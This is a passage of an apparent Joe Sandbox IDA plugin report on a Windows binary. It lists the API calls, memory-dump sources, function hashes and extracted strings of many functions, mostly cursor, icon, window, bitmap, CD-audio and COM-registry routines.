                                                                                                                            • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1481289235-0
                                                                                                                            • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                            • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                            • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                            • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                            APIs
                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                            • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                            • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                            • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                            • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                            • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                            • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                            • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                            • SendMessageW.USER32 ref: 0046FD00
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2632138820-0
                                                                                                                            • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                            • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                            • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                            • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                            APIs
                                                                                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                            • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CursorLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3238433803-0
                                                                                                                            • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                            • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                            • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                            • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                            APIs
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                            • _wcslen.LIBCMT ref: 00460B00
                                                                                                                            • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                            • GetParent.USER32(?), ref: 00460D40
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                            • String ID: %s%u
                                                                                                                            • API String ID: 1899580136-679674701
                                                                                                                            • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                            • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                            • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                            • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                            APIs
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                            • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                            • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                            • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                            • API String ID: 2485709727-934586222
                                                                                                                            • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                            • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                            • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                            • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 3381189665-2761332787
                                                                                                                            • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                            • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                            • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                            • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 00434585
                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                            • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                            • String ID: (
                                                                                                                            • API String ID: 3300687185-3887548279
                                                                                                                            • Opcode ID: 22bfe96d37ff820aa9eb38f6aa26196b3985a0e9bf585a9783a7fb094f2b1cb4
                                                                                                                            • Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
                                                                                                                            • Opcode Fuzzy Hash: 22bfe96d37ff820aa9eb38f6aa26196b3985a0e9bf585a9783a7fb094f2b1cb4
                                                                                                                            • Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
                                                                                                                            APIs
                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                                                                            • __swprintf.LIBCMT ref: 0045E4D9
                                                                                                                            • _printf.LIBCMT ref: 0045E595
                                                                                                                            • _printf.LIBCMT ref: 0045E5B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                                                                            • API String ID: 3590180749-2894483878
                                                                                                                            • Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                            • Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
                                                                                                                            • Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
                                                                                                                            • Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
                                                                                                                            APIs
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                                                                            • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F950
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                                                                            • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                                                                            • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                                                                            • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                                                                            • DeleteObject.GDI32(?), ref: 0046FA68
                                                                                                                            • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3412594756-0
                                                                                                                            • Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                            • Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
                                                                                                                            • Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
                                                                                                                            • Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                            • API String ID: 4013263488-4113822522
                                                                                                                            • Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                            • Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
                                                                                                                            • Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
                                                                                                                            • Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 228034949-0
                                                                                                                            • Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                            • Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
                                                                                                                            • Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
                                                                                                                            • Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                                                                            • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                                                                            • DeleteObject.GDI32(?), ref: 00433603
                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3969911579-0
                                                                                                                            • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                            • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                            • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                            • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
                                                                                                                            APIs
                                                                                                                            • GetParent.USER32 ref: 00445A8D
                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AC4
                                                                                                                            • __wcsicoll.LIBCMT ref: 00445AE0
                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                            • API String ID: 3125838495-3381328864
                                                                                                                            • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                            • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                                                                            • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                                                                            • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
